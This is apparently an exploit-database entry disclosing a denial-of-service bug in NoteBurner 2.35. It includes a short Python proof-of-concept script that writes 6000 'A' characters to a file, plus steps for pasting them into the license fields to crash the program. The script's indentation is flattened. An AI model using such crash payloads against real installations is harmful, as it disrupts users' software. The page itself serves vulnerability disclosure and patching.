NoteBurner 2.35 - Denial Of Service (DoS) (PoC)

vendor:

NoteBurner

by:

Achilles

7,8

CVSS

HIGH

Denial Of Service (DoS)

CWE

Product Name: NoteBurner

Affected Version From: 2.35

Affected Version To: 2.35

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 x64

2021

NoteBurner 2.35 – Denial Of Service (DoS) (PoC)

A vulnerability in NoteBurner 2.35 could allow an attacker to cause a denial of service (DoS) condition. The vulnerability is due to insufficient input validation when processing user-supplied data. An attacker could exploit this vulnerability by crafting a malicious file and convincing a user to open it. A successful exploit could cause the application to crash, resulting in a denial of service condition.

Mitigation:

Update to the latest version of NoteBurner.

Source

Exploit-DB raw data:

# Exploit Title: NoteBurner 2.35 - Denial Of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage:https://www.noteburner.com/
# Software Link:  https://anonfiles.com/13h9Hb82ub/noteburner_exe
# Exploit Author: Achilles
# Tested Version: 2.35
# Tested on: Windows 7 x64


# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Noteburner
# 4.- Click More and Enter License Code
# 5.- Paste the content of EVIL.txt into the Field: 'Name' and 'Code'
# 6.- Click 'OK' and you will see a crash.

#!/usr/bin/env python
buffer = "\x41" * 6000

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"